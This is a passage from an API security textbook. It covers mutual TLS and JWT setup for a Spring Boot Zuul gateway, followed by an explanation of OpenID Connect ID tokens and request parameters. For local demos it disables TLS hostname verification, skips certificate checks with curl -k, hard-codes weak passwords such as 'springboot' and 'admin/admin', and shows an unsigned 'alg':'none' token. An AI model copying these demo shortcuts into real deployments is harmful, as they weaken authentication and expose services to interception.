server.ssl.key-store: keystore.jks server.ssl.key-store-password: springboot server.ssl.keyAlias: spring server.ssl.client-auth:need There are two more changes we need to do at the Order service end. When we enforce mutual TLS at the Order service, the Zuul gateway (which acts as a client to the Order service) has to authenticate itself with an X.509 certificate—and the Order service must trust the certificate authority associated with Zuul gateway’s X.509 certificate. Since we are using self-signed certificate, we need to export Zuul gateway’s public certificate and import it to the Order service’s keystore. Let’s use the following keytool command from ch05/sample02 directory to export Zuul gateway’s public certificate and copy it to ch05/sample01 directory. \> keytool -export -alias spring -keystore keystore.jks -storePass springboot -file zuul.crt Certificate stored in file <zuul.crt> \> cp zuul.crt ../sample01 Chapter 5 edge SeCurity with an api gateway 119 Let’s use the following keytool command from ch05/sample01 directory to import Zuul gateway’s public certificate to Order service’s keystore. \> keytool -import -alias zuul -keystore keystore.jks -storePass springboot -file zuul.crt Trust this certificate? [no]:yes Certificate was added to keystore Finally, when we have a TLS connection between the Zuul gateway and the Order service, the Zuul gateway has to trust the certificate authority associated with the public certificate of the Order service. Even though we do not enable mutual TLS between these two parties, we still need to satisfy this requirement to enable just TLS. Since we are using self-signed certificate, we need to export Order service’s public certificate and import it to Zuul gateway’s keystore. Let’s use the following keytool command from ch05/sample01 directory to export Order service’s public certificate and copy it to ch05/sample02 directory. \> keytool -export -alias spring -keystore keystore.jks -storePass springboot -file order.crt Certificate stored in file <order.crt> \> cp order.crt ../sample02 Let’s use the following keytool command from ch05/sample02 directory to import Order service’s public certificate to Zuul gateway’s keystore. \> keytool -import -alias order -keystore keystore.jks -storePass springboot -file order.crt Trust this certificate? [no]:yes Certificate was added to keystore To validate that TLS works fine with the Order service, use the following command from ch05/sample01/ directory to spin up the Order service and notice the line, which prints the HTTPS port. If you already have the Order service running from the previous exercise, please shut it down first. \> mvn spring-boot:run Tomcat started on port(s): 8080 (https) with context path " Since we updated the Order service endpoint to use HTTPS instead of HTTP, we also need to update the Zuul gateway to use the new HTTPS endpoint. These routing instructions are set in the ch05/sample02/src/main/resources/application. Chapter 5 edge SeCurity with an api gateway 120 properties file, as shown in the following. Just update it to use HTTPS instead of HTTP. Also we need to uncomment the zuul.sslHostnameValidationEnabled property in the same file and set it to false. This is to ask Spring Boot to ignore hostname verification. Or in other words, now Spring Boot won’t check whether the hostname of the Order service matches the common name of the corresponding public certificate. 
zuul.routes.retail.url=https://localhost:8080 zuul.sslHostnameValidationEnabled=false Restart the Zuul gateway with the following command from ch05/sample02. \> mvn spring-boot:run Assuming you have authorization server up and running, on HTTPS port 8443, run the following command to test the end-to-end flow. First we need to talk to the security token service and get an access token. Make sure to replace the values of $CLIENTID, $CLIENTSECRET, $USERNAME, and $PASSWORD appropriately in the following command. The hard-coded values for client id and client secret used in our example are 10101010 and 11110000, respectively; and for username and password, we used peter and peter123, respectively. \> curl -v -X POST --basic -u $CLIENTID:$CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=passwor d&username=$USERNAME&password=$PASSWORD&scope=foo" https://localhost:8443/ oauth/token {"access_token":"69ff86a8-eaa2-4490-adda-6ce0f10b9f8b","token_ type":"bearer","refresh_token":"ab3c797b-72e2-4a9a-a1c5- c550b2775f93","expires_in":43199,"scope":"foo"} Now let’s use the access token from the preceding response to invoke the Order API. Make sure to replace the value of $TOKEN with the corresponding access token appropriately. \> curl -k -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/ json" https://localhost:9090/retail/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type":"V ISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} Chapter 5 edge SeCurity with an api gateway 121 Securing Order API with Self-Contained Access Tokens An OAuth 2.0 bearer token can be a reference token or self-contained token. A reference token is an arbitrary string. An attacker can carry out a brute-force attack to guess the token. The authorization server must pick the right length and use other possible measures to prevent brute forcing. A self-contained access token is a JSON Web Token (JWT), which we discuss in Chapter 7. When the resource server gets an access token, which is a reference token, then to validate the token, it has to talk to the authorization server (or the token issuer). When the access token is a JWT, the resource server can validate the token by itself, by verifying the signature of the JWT. In this section, we discuss how to obtain a JWT access token from the authorization server and use it to access the Order service through the Zuul API gateway. Setting Up an Authorization Server to Issue JWT In this section, we’ll see how to extend the authorization server we used in the previous section (ch05/sample03/) to support self-contained access tokens or JWTs. The first step is to create a new key pair along with a keystore. This key is used to sign the JWTs issued from our authorization server. The following keytool command will create a new keystore with a key pair. \> keytool -genkey -alias jwtkey -keyalg RSA -keysize 2048 -dname "CN=localhost" -keypass springboot -keystore jwt.jks -storepass springboot The preceding command creates a keystore with the name jwt.jks, protected with the password springboot. We need to copy this keystore to sample03/src/main/ resources/. Now to generate self-contained access tokens, we need to set the values of the following properties in sample03/src/main/resources/application.properties file. 
spring.security.oauth.jwt: true spring.security.oauth.jwt.keystore.password: springboot spring.security.oauth.jwt.keystore.alias: jwtkey spring.security.oauth.jwt.keystore.name: jwt.jks Chapter 5 edge SeCurity with an api gateway 122 The value of spring.security.oauth.jwt is set to false by default, and it has to be changed to true to issue JWTs. The other three properties are self-explanatory, and you need to set them appropriately based on the values you used in creating the keystore. Let’s go through the notable changes in the source code to support JWTs. First, in the pom.xml, we need to add the following dependency, which takes care of building JWTs. <dependency> <groupId>org.springframework.security</groupId> <artifactId>spring-security-jwt</artifactId> </dependency> In sample03/src/main/java/com/apress/ch05/sample03/config/ AuthorizationServerConfig.java class, we have added the following method, which takes care of injecting the details about how to retrieve the private key from the jwt.jks keystore, which we created earlier. This private key is used to sign the JWT. @Bean protected JwtAccessTokenConverter jwtConeverter() { String pwd = environment.getProperty("spring.security.oauth.jwt. keystore.password"); String alias = environment.getProperty("spring.security.oauth.jwt. keystore.alias"); String keystore = environment.getProperty("spring.security.oauth.jwt. keystore.name"); String path = System.getProperty("user.dir"); KeyStoreKeyFactory keyStoreKeyFactory = new KeyStoreKeyFactory( new FileSystemResource(new File(path + File.separator + keystore)), pwd.toCharArray()); JwtAccessTokenConverter converter = new JwtAccessTokenConverter(); converter.setKeyPair(keyStoreKeyFactory.getKeyPair(alias)); return converter; } In the same class file, we also set JwtTokenStore as the token store. The following function does it in a way, we only set the JwtTokenStore as the token store only if spring.security.oauth.jwt property is set to true in the application.properties file. Chapter 5 edge SeCurity with an api gateway 123 @Bean public TokenStore tokenStore() { String useJwt = environment.getProperty("spring.security.oauth.jwt"); if (useJwt != null && "true".equalsIgnoreCase(useJwt.trim())) { return new JwtTokenStore(jwtConeverter()); } else { return new InMemoryTokenStore(); } } Finally, we need to set the token store to AuthorizationServerEndpointsConfigurer, which is done in the following method, and once again, only if we want to use JWTs. @Autowired private AuthenticationManager authenticationManager; @Override public void configure(AuthorizationServerEndpointsConfigurer endpoints) throws Exception { String useJwt = environment.getProperty("spring.security.oauth.jwt"); if (useJwt != null && "true".equalsIgnoreCase(useJwt.trim())) { endpoints.tokenStore(tokenStore()).tokenEnhancer(jwtConeverter()) .authenticationManager(authenticationManager); } else { endpoints.authenticationManager(authenticationManager); } } To start the authorization server, use the following command from ch05/sample03/ directory, which now issues self-contained access tokens (JWTs). \> mvn spring-boot:run To get an access token using the OAuth 2.0 client credentials grant type, use the following command. Make sure to replace the values of $CLIENTID and $CLIENTSECRET appropriately. The hard-coded values for client id and client secret used in our example are 10101010 and 11110000, respectively. 
Chapter 5 edge SeCurity with an api gateway 124 \> curl -v -X POST --basic -u $CLIENTID:$CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=client_ credentials&scope=foo" https://localhost:8443/oauth/token The preceding command will return back a base64-url-encoded JWT, and the following shows the decoded version. { "alg": "RS256", "typ": "JWT" } { "scope": [ "foo" ], "exp": 1524793284, "jti": "6e55840e-886c-46b2-bef7- 1a14b813dd0a", "client_id": "10101010" } Only the decoded header and the payload are shown in the output, skipping the signature (which is the third part of the JWT). Since we used client_credentials grant type, the JWT does not include a subject or username. It also includes the scope value(s) associated with the token. Protecting Zuul API Gateway with JWT In this section, we’ll see how to enforce self-issued access token or JWT-based token validation at the Zuul API gateway. We only need to comment out security.oauth2. resource.user-info-uri property and uncomment security.oauth2.resource.jwt. keyUri property in sample02/src/main/resources/application.properties file. The updated application.properties file will look like the following. #security.oauth2.resource.user-info-uri:https://localhost:8443/user security.oauth2.resource.jwt.keyUri: https://localhost:8443/oauth/token_key Here the value of security.oauth2.resource.jwt.keyUri points to the public key corresponding to the private key, which is used to sign the JWT by the authorization server. It’s an endpoint hosted under the authorization server. If you just type https:// localhost:8443/oauth/token_key on the browser, you will find the public key, as shown in the following. This is the key the API gateway uses to verify the signature of the JWT included in the request. { "alg":"SHA256withRSA", "value":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMI IBCgKCAQEA+WcBjPsrFvGOwqVJd8vpV+gNx5onTyLjYx864mtIvUxO8D4mwAaYpjXJgsre2dc XjQ03BOLJdcjY5Nc9Kclea09nhFIEJDG3obwxm9gQw5Op1TShCP30Xqf8b7I738EHDFT6 Chapter 5 edge SeCurity with an api gateway 125 qABul7itIxSrz+AqUvj9LSUKEw/cdXrJeu6b71qHd/YiElUIA0fjVwlFctbw7REbi3Sy3nWdm 9yk7M3GIKka77jxw1MwIBg2klfDJgnE72fPkPi3FmaJTJA4+9sKgfniFqdMNfkyLVbOi9E3Dla oGxEit6fKTI9GR1SWX40FhhgLdTyWdu2z9RS2BOp+3d9WFMTddab8+fd4L2mYCQIDAQ AB\n-----END PUBLIC KEY-----" } Once the changes are made as highlighted earlier, let’s restart the Zuul gateway with the following command from the sample02 directory. \> mvn spring-boot:run Once we have a JWT access token obtained from the OAuth 2.0 authorization server, in the same way as we did before, with the following cURL command, we can access the protected resource. Make sure the value of $TOKEN is replaced appropriately with a valid JWT access token. \> curl -k -H "Authorization: Bearer $TOKEN" https://localhost:9443/ order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type":"VISA", "expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items":[{"code":"101","qty":1},{"code":"103","qty":5}]," shipping_address":"201, 1st Street, San Jose, CA"} The Role of a Web Application Firewall (WAF) As we discussed before, an API gateway is a policy enforcement point (PEP), which centrally enforces authentication, authorization, and throttling policies. In a public- facing API deployment, an API gateway is not just sufficient. We also need a web application firewall (WAF) sitting in front of the API gateway (see Figure 5-4). 
The primary role of a WAF is to protect your API deployment from distributed denial of service (DDoS) attacks—do threat detection and message validation against OpenAPI Specification (OAS) along with known threats identified by Open Web Application Security Project (OWASP). Gartner (one of the leading analyst firms) predicts that by 2020, more than 50% of public-facing web applications will be protected by cloud-based WAF service platforms such Akamai, Imperva, Cloudflare, Amazon Web Services, and so on, up from less than 20% in December 2018. Chapter 5 edge SeCurity with an api gateway 126 Summary • OAuth 2.0 is the de facto standard for securing APIs. • The API gateway is the most common pattern in securing APIs in a production deployment. In other words, it’s the entry point to your API deployment. • There are many open source and proprietary products out there, which implement the API gateway pattern, which we commonly identify as API gateways. • An OAuth 2.0 bearer token can be a reference token or self-contained token. A reference token is an arbitrary string. An attacker can carry out a brute-force attack to guess the token. The authorization server must pick the right length and use other possible measures to prevent brute forcing. Figure 5-4. A web application firewall (WAF) intercepts all the traffic coming into an API deployment Chapter 5 edge SeCurity with an api gateway 127 • When the resource server gets an access token, which is a reference token, then to validate the token, it has to talk to the authorization server (or the token issuer). When the access token is a JWT, the resource server can validate the token by itself, by verifying the signature of the JWT. • Zuul is an API gateway that provides dynamic routing, monitoring, resiliency, security, and more. It is acting as the front door to Netflix’s server infrastructure, handling traffic from all Netflix users around the world. • In a public-facing API deployment, an API gateway is not just sufficient. We also need a web application firewall (WAF) sitting in front of the API gateway. Chapter 5 edge SeCurity with an api gateway 129 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_6 CHAPTER 6 OpenID Connect (OIDC) OpenID Connect provides a lightweight framework for identity interactions in a RESTful manner and was ratified as a standard by its membership on February 26, 2014.1 It was developed under the OpenID Foundation and has its roots in OpenID, but was greatly affected by OAuth 2.0. OpenID Connect is the most popular Identity Federation protocol at the time of this writing. Most of the applications developed in the last few years are supporting OpenID Connect. Ninety-two percent of the 8 billion+ authentication requests Microsoft Azure AD handled in May 2018 were from OpenID Connect–enabled applications. From OpenID to OIDC OpenID, which followed in the footsteps of Security Assertion Markup Language (SAML) in 2005, revolutionized web authentication. Brad Fitzpatrick, the founder of LiveJournal, came up with the initial idea of OpenID. The basic principle behind both OpenID and SAML (discussed in Chapter 12) is the same. Both can be used to facilitate web single sign-on (SSO) and cross- domain identity federation. OpenID is more community- friendly, user centric, and decentralized. Yahoo! added OpenID support in January 2008, MySpace announced its support for OpenID in July of the same year, and Google joined the party in October. 
By December 2009, there were more than 1 billion OpenID-enabled accounts. It was a huge success as a web SSO protocol. OpenID and OAuth 1.0 address two different concerns. OpenID is about authentication, whereas OAuth 1.0 is about delegated authorization. As both of these standards were gaining popularity in their respective domains, there was an interest in 1 The announcement by the OpenID Foundation regarding the launch of the OpenID Connect standard is available at http://bit.ly/31PowsS 130 combining them, so that it would be possible to authenticate a user and also get a token to access resources on his or her behalf in a single step. The Google Step 2 project was the first serious effort in this direction. It introduced an OpenID extension for OAuth, which basically takes OAuth-related parameters in the OpenID request/response. The same people who initiated the Google Step 2 project later brought it into the OpenID Foundation. OpenID has gone through three generations to date. OpenID 1.0/1.1/2.0 was the first generation, and the OpenID extension for OAuth is the second. OpenID Connect (OIDC) is the third generation of OpenID. Yahoo!, Google, and many other OpenID providers discontinued their support for OpenID around mid-2015 and migrated to OpenID Connect. OPENID CONNECT IS NOT OPENID, THIS IS HOW OPENID WORKS! How many profiles do you maintain today at different web sites? Perhaps you have one on Yahoo!, one on Facebook, one on Google, and so on. Each time you update your mobile number or home address, either you have to update all your profiles or you risk outdating most of your profiles. OpenID solves the problem of scattered profiles on different websites. With OpenID, you maintain your profile only at your OpenID provider, and all the other sites become OpenID relying parties. These relying parties communicate with your OpenID provider to obtain your information. Each time you try to log in to a relying party website, you’re redirected to your OpenID provider. At the OpenID provider, you have to authenticate and approve the request from the relying party for your attributes. Upon approval, you’re redirected back to the relying party with the requested attributes. This goes beyond simple attribute sharing to facilitate decentralized SSO. With SSO, you only log in once at the OpenID provider. That is, when a relying party redirects you to the OpenID provider for the first time. After that, for the subsequent redirects by other relying parties, your OpenID provider doesn’t ask for credentials but uses the authenticated session you created before at the OpenID provider. This authenticated session is maintained either by a cookie until the browser is closed or with persistent cookies. Figure 6-1 illustrates how OpenID works. CHAPTEr 6 OPEnID COnnECT (OIDC) 131 The end user initiates the OpenID flow by typing his or her OpenID on the relying party web site (step 1). An OpenID is a unique UrL or an XrI (Extensible resource Identifier). For example, http://prabath.myopenid.com is an OpenID. Once the user types his or her OpenID, the relying party has to do a discovery based on it to find out the corresponding OpenID provider (step 2). The relying party performs an HTTP GET on the OpenID (which is a UrL) to get back the HTML text behind it. For example, if you view the source that is behind http:// prabath.myopenid.com, you’ll see the following tag (MyOpenID was taken down some years back). This is exactly what the relying party sees during the discovery phase. 
This tag indicates which OpenID provider is behind the provided OpenID: <link rel="openid2.provider" href="http://www.myopenid.com/server" /> OpenID has another way of identifying the OpenID provider, other than asking for an OpenID from the end user. This is known as directed identity, and Yahoo!, Google, and many other OpenID providers used it. If a relying party uses directed identity, it already knows who the OpenID provider is, so a discovery phase isn’t needed. The relying party lists the set of OpenID providers it supports, and the user has to pick which one it wants to authenticate against. Once the OpenID provider is discovered, the next step depends on the type of the relying party. If it’s a smart relying party, then it executes step 3 in Figure 6-1 to create an association with Figure 6-1. OpenID protocol flow CHAPTEr 6 OPEnID COnnECT (OIDC) 132 the OpenID provider. During the association, a shared secret key is established between the OpenID provider and the relying party. If a key is already established between the two parties, this step is skipped, even for a smart relying party. A dumb relying party always ignores step 3. In step 5, the user is redirected to the discovered OpenID provider. In step 6, the user has to authenticate and approve the attribute request from the relying party (steps 6 and 7). Upon approval, the user is redirected back to the relying party (step 9). A key only known to the OpenID provider and the corresponding relying party signs this response from the OpenID provider. Once the relying party receives the response, if it’s a smart relying party, it validates the signature itself. The key shared during the association phase should sign the message. If it’s a dumb relying party, it directly talks to the OpenID provider in step 10 (not a browser redirect) and asks to validate the signature. The decision is passed back to the relying party in step 11, and that concludes the OpenID protocol flow. Amazon Still Uses OpenID 2.0 Few have noticed that Amazon still uses (at the time of this writing) OpenID for user authentication. Check it out yourself: go to www.amazon.com, and click the Sign In button. Then observe the browser address bar. You see something similar to the following, which is an OpenID authentication request: https://www.amazon.com/ap/signin?_encoding=UTF8 &openid.assoc_handle=usflex &openid.claimed_id= http://specs.openid.net/auth/2.0/identifier_select &openid.identity= http://specs.openid.net/auth/2.0/identifier_select &openid.mode=checkid_setup &openid.ns=http://specs.openid.net/auth/2.0 &openid.ns.pape= http://specs.openid.net/extensions/pape/1.0 &openid.pape.max_auth_age=0 &openid.return_to=https://www.amazon.com/gp/yourstore/home CHAPTEr 6 OPEnID COnnECT (OIDC) 133 Understanding OpenID Connect OpenID Connect was built on top of OAuth 2.0. It introduces an identity layer on top of OAuth 2.0. This identity layer is abstracted into an ID token, which is JSON Web Token (JWT), and we talk about JWT in detail in Chapter 7. An OAuth 2.0 authorization server that supports OpenID Connect returns an ID token along with the access token. OpenID Connect is a profile built on top of OAuth 2.0. OAuth talks about access delegation, while OpenID Connect talks about authentication. In other words, OpenID Connect builds an identity layer on top of OAuth 2.0. Authentication is the act of confirming the truth of an attribute of a datum or entity. If I say I am Peter, I need to prove that. 
I can prove that with something I know, something I have, or with something I am. Once proven who I claim I am, then the system can trust me. Sometimes systems do not just want to identify end users just by the name. Name could help to identify uniquely—but how about other attributes? Before you get through the border control, you need to identify yourself—by name, by picture, and also by fingerprints and eye retina. Those are validated in real time against the data from the VISA office, which issued the VISA for you. That check will make sure it’s the same person who claimed to have the VISA that enters into the country. That is proving your identity. Proving your identity is authentication. Authorization is about what you can do or your capabilities. You could prove your identity at the border control by name, by picture, and also by fingerprints and eye retina—but it's your visa that decides what you can do. To enter into the country, you need to have a valid visa that has not expired. A valid visa is not a part of your identity, but a part of what you can do. What you can do inside the country depends on the visa type. What you do with a B1 or B2 visa differs from what you can do with an L1 or L2 visa. That is authorization. OAuth 2.0 is about authorization—not about authentication. With OAuth 2.0, the client does not know about the end user (only exception is resource owner password credentials grant type, which we discussed in Chapter 4). It simply gets an access token to access a resource on behalf of the user. With OpenID Connect, the client will get an ID token along with the access token. ID token is a representation of the end user’s identity. What does it mean by securing an API with OpenID Connect? Or is it totally meaningless? OpenID Connect is at the application level or at the client level—not at the API level or at the resource server level. OpenID Connect helps client or the application to find out who the end user is, but for the API that is meaningless. The only thing API expects is the CHAPTEr 6 OPEnID COnnECT (OIDC) 134 access token. If the resource owner or the API wants to find who the end user is, it has to query the authorization server or rely on a self-contained access token (which is a JWT). Anatomy of the ID Token The ID token is the primary add-on to OAuth 2.0 to support OpenID Connect. It’s a JSON Web Token (JWT) that transports authenticated user information from the authorization server to the client application. Chapter 7 delves deeper into JWT. The structure of the ID token is defined by the OpenID Connect specification. The following shows a sample ID token: { "iss":"https://auth.server.com", "sub":"prabath@apache.org", "aud":"67jjuyuy7JHk12", "nonce":"88797jgjg32332", "exp":1416283970, "iat":1416281970, "auth_time":1311280969, "acr":"urn:mace:incommon:iap:silver", "amr":"password", "azp":"67jjuyuy7JHk12" } Let’s examine the definition of each attribute: • iss: The token issuer’s (authorization server or identity provider) identifier in the format of an HTTPS URL with no query parameters or URL fragments. In practice, most of the OpenID Provider implementations or products let you configure an issuer you want— and also this is mostly being used as an identifier, rather than a URL. This is a required attribute in the ID token. • sub: The token issuer or the asserting party issues the ID token for a particular entity, and the claims set embedded into the ID token normally represents this entity, which is identified by the sub parameter. 
The value of the sub parameter is a case-sensitive string value and is a required attribute in the ID token. CHAPTEr 6 OPEnID COnnECT (OIDC) 135 • aud: The audience of the token. This can be an array of identifiers, but it must have the OAuth client ID in it; otherwise, the client ID should be added to the azp parameter, which we discuss later in this section. Prior to any validation check, the OpenID client must first see whether the particular ID token is issued for its use and if not should reject immediately. In other words, you need to check whether the value of the aud attribute matches with the OpenID client’s identifier. The value of the aud parameter can be a case-sensitive string value or an array of strings. This is a required attribute in the ID token. • nonce: A new parameter introduced by the OpenID Connect specification to the initial authorization grant request. In addition to the parameters defined in OAuth 2.0, the client application can optionally include the nonce parameter. This parameter was introduced to mitigate replay attacks. The authorization server must reject any request if it finds two requests with the same nonce value. If a nonce is present in the authorization grant request, then the authorization server must include the same value in the ID token. The client application must validate the value of the nonce once it receives the ID token from the authorization server. • exp: Each ID token carries an expiration time. The recipient of the ID token must reject it, if that token has expired. The issuer can decide the value of the expiration time. The value of the exp parameter is calculated by adding the expiration time (from the token issued time) in seconds to the time elapsed from 1970-01-01T00:00:00Z UTC to the current time. If the token issuer’s clock is out of sync with the recipient’s clock (irrespective of their time zone), then the expiration time validation could fail. To fix that, each recipient can add a couple of minutes as the clock skew during the validation process. This is a required attribute in the ID token. • iat: The iat parameter in the ID token indicates the issued time of the ID token as calculated by the token issuer. The value of the iat parameter is the number of seconds elapsed from 1970-01-01T00:00:00Z UTC to the current time, when the token is issued. This is a required attribute in the ID token. CHAPTEr 6 OPEnID COnnECT (OIDC) 136 • auth_time: The time at which the end user authenticates with the authorization server. If the user is already authenticated, then the authorization server won’t ask the user to authenticate back. How a given authorization server authenticates the user, and how it manages the authenticated session, is outside the scope of OpenID Connect. A user can create an authenticated session with the authorization server in the first login attempt from a different application, other than the OpenID client application. In such cases, the authorization server must maintain the authenticated time and include it in the parameter auth_time. This is an optional parameter. • acr: Stands for authentication context class reference. The value of this parameter must be understood by both the authorization server and the client application. It gives an indication of the level of authentication. For example, if the user authenticates with a long- lived browser cookie, it is considered as level 0. OpenID Connect specification does not recommend using an authentication level of 0 to access any resource of any monetary value. 
This is an optional parameter. • amr: Stands for authentication method references. It indicates how the authorization server authenticates the user. It may consist of an array of values. Both the authorization server and the client application must understand the value of this parameter. For example, if the user authenticates at the authorization server with username/password and with one-time passcode over SMS, the value of amr parameter must indicate that. This is an optional parameter. • azp: Stands for authorized party. It’s needed when there is one audience (aud) and its value is different from the OAuth client ID. The value of azp must be set to the OAuth client ID. This is an optional parameter. Note The authorization server must sign the ID token, as defined in JSOn Web Signature (JWS) specification. Optionally, it can also be encrypted. Token encryption should follow the rules defined in the JSOn Web Encryption (JWE) specification. If the ID token is encrypted, it must be signed first and then encrypted. This is because signing the encrypted text is questionable in many legal entities. Chapters 7 and 8 talk about JWT, JWS, and JWE. CHAPTEr 6 OPEnID COnnECT (OIDC) 137 OPENID CONNECT WITH WSO2 IDENTITY SERVER In this exercise, you see how to obtain an OpenID Connect ID token along with an OAuth 2.0 access token. Here we run the WSO2 Identity Server as the OAuth 2.0 authorization server. Note WSO2 Identity Server is a free, open source identity and entitlement management server, released under the Apache 2.0 license. At the time of this writing, the latest released version is 5.9.0 and runs on Java 8. Follow these steps to register your application as a service provider in WSO2 Identity Server and then log in to your application via OpenID Connect: 1. Download WSO2 Identity Server 5.9.0 from http://wso2.com/products/ identity-server/, set up the JAVA_HOME environment variable, and start the server from the wso2server.sh/wso2server.bat file in the WSO2_IS_HOME/ bin directory. If the WSO2 Identity Server 5.9.0 isn’t available from the main download page, you can find it at http://wso2.com/more-downloads/ identity-server/. 2. By default, the WSO2 Identity Server starts on HTTPS port 9443. 3. Log in to the Identity Server running at https://localhost:9443 with its default username and password (admin/admin). 4. To get an OAuth 2.0 client ID and a client secret for a client application, you need to register it as a service provider on the OAuth 2.0 authorization server. Choose Main ➤ Service Providers ➤ Add. Enter a name, say, oidc-app, and click register. 5. Choose Inbound Authentication Configuration ➤ OAuth and OpenID Connect Configuration ➤ Configure. 6. Uncheck all the grant types except Code. Make sure the OAuth version is set to 2.0. 7. Provide a value for the Callback Url text box—say, https://localhost/ callback—and click Add. 8. Copy the values of OAuth Client Key and the OAuth Client Secret. CHAPTEr 6 OPEnID COnnECT (OIDC) 138 9. You use cUrL here instead of a full-blown web application. First you need to get an authorization code. Copy the following UrL, and paste it into a browser. replace the values of client_id and redirect_uri appropriately. note that here we are passing the openid as the value of the scope parameter in the request. This is a must to use OpenID Connect. You’re directed to a login page where you can authenticate with admin/admin and then approve the request by the client: https://localhost:9443/oauth2/authorize? 
response_type=code&scope=openid& client_id=NJ0LXcfdOW20EvD6DU0l0p01u_Ya& redirect_uri=https://localhost/callback 10. Once approved, you’re redirected back to the redirect_uri with the authorization code, as shown here. Copy the value of the authorization code: https://localhost/callback?code=577fc84a51c2aceac2a9e2f723f0f47f 11. now you can exchange the authorization code from the previous step for an ID token and an access token. replace the value of client_id, client_secret, code, and redirect_uri appropriately. The value of –u is constructed as client_id:client_secret: curl -v -X POST --basic -u NJ0LXcfdOW2...:EsSP5GfYliU96MQ6... -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -k -d "client_id=NJ0LXcfdOW20EvD6DU0l0p01u_Ya& grant_type=authorization_code& code=577fc84a51c2aceac2a9e2f723f0f47f& redirect_uri=https://localhost/callback" https://localhost:9443/oauth2/token This results in the following JSOn response: { "scope":"openid", "token_type":"bearer", "expires_in":3299, "refresh_token":"1caf88a1351d2d74093f6b84b8751bb", CHAPTEr 6 OPEnID COnnECT (OIDC) 139 "id_token":"eyJhbGciOiJub25......", "access_token":"6cc611211a941cc95c0c5caf1385295" } 12. The value of id_token is base64url-encoded. Once it’s base64url-decoded, it looks like the following. Also you can use an online tool like https://jwt.io to decode the ID token: { "alg":"none", "typ":"JWT" }. { "exp":1667236118, "azp":"NJ0LXcfdOW20EvD6DU0l0p01u_Ya", "sub":"admin@carbon.super", "aud":"NJ0LXcfdOW20EvD6DU0l0p01u_Ya", "iss":"https://localhost:9443/oauth2endpoints/token", "iat":1663636118 } OpenID Connect Request The ID token is the heart of OpenID Connect, but that isn’t the only place where it deviates from OAuth 2.0. OpenID Connect introduced some optional parameters to the OAuth 2.0 authorization grant request. The previous exercise didn’t use any of those parameters. Let’s examine a sample authorization grant request with all the optional parameters: https://localhost:9443/oauth2/authorize?response_type=code& scope=openid& client_id=NJ0LXcfdOW20EvD6DU0l0p01u_Ya& redirect_uri= https://localhost/callback& response_mode=.....& nonce=.....& display=....& prompt=....& max_age=.....& ui_locales=.....& CHAPTEr 6 OPEnID COnnECT (OIDC) 140 id_token_hint=.....& login_hint=.....& acr_value=..... Let’s review the definition of each attribute: • response_mode: Determines how the authorization server sends back the parameters in the response. This is different from the response_ type parameter, defined in the OAuth 2.0 core specification. With the response_type parameter in the request, the client indicates whether it expects a code or a token. In the case of an authorization code grant type, the value of response_type is set to code, whereas with an implicit grant type, the value of response_type is set to token. The response_mode parameter addresses a different concern. If the value of response_mode is set to query, the response parameters are sent back to the client as query parameters appended to the redirect_ uri; and if the value is set to fragment, then the response parameters are appended to the redirect_uri as a URI fragment. • nonce: Mitigates replay attacks. The authorization server must reject any request if it finds two requests with the same nonce value. If a nonce is present in the authorization grant request, then the authorization server must include the same value in the ID token. The client application must validate the value of the nonce once it receives the ID token from the authorization server. 
• display: Indicates how the client application expects the authorization server to display the login page and the user consent page. Possible values are page, popup, touch, and wap. • prompt: Indicates whether to display the login or the user consent page at the authorization server. If the value is none, then neither the login page nor the user consent page should be presented to the user. In other words, it expects the user to have an authenticated session at the authorization server and a preconfigured user consent. If the value is login, the authorization server must reauthenticate the user. If the value is consent, the authorization server must display the user consent page to the end user. The select_account option can be CHAPTEr 6 OPEnID COnnECT (OIDC) 141 used if the user has multiple accounts on the authorization server. The authorization server must then give the user an option to select from which account he or she requires attributes. • max_age: In the ID token there is a parameter that indicates the time of user authentication (auth_time). The max_age parameter asks the authorization server to compare that value with max_age. If it’s less than the gap between the current time and max_age (current time- max_age), the authorization server must reauthenticate the user. When the client includes the max_age parameter in the request, the authorization server must include the auth_time parameter in the ID token. • ui_locales: Expresses the end user’s preferred language for the user interface. • id_token_hint: An ID token itself. This could be an ID token previously obtained by the client application. If the token is encrypted, it has to be decrypted first and then encrypted back by the public key of the authorization server and then placed into the authentication request. If the value of the parameter prompt is set to none, then the id_token_hint could be present in the request, but it isn’t a requirement. • login_hint: This is an indication of the login identifier that the end user may use at the authorization server. For example, if the client application already knows the email address or phone number of the end user, this could be set as the value of the login_hint. This helps provide a better user experience. • acr_values: Stands for authentication context reference values. It includes a space-separated set of values that indicates the level of authentication required at the authorization server. The authorization server may or may not respect these values. Note All OpenID Connect authentication requests must have a scope parameter with the value openid. CHAPTEr 6 OPEnID COnnECT (OIDC) 142 Requesting User Attributes OpenID Connect defines two ways to request user attributes. The client application can either use the initial OpenID Connect authentication request to request attributes or else later talk to a UserInfo endpoint hosted by the authorization server. If it uses the initial authentication request, then the client application must include the requested claims in the claims parameter as a JSON message. The following authorization grant request asks to include the user’s email address and the given name in the ID token: https://localhost:9443/oauth2/authorize? response_type=code& scope=openid& client_id=NJ0LXcfdOW20EvD6DU0l0p01u_Ya& redirect_uri=https://localhost/callback& claims={ "id_token": { "email": {"essential": true}, "given_name": {"essential": true}, } } Note The OpenID Connect core specification defines 20 standard user claims. 
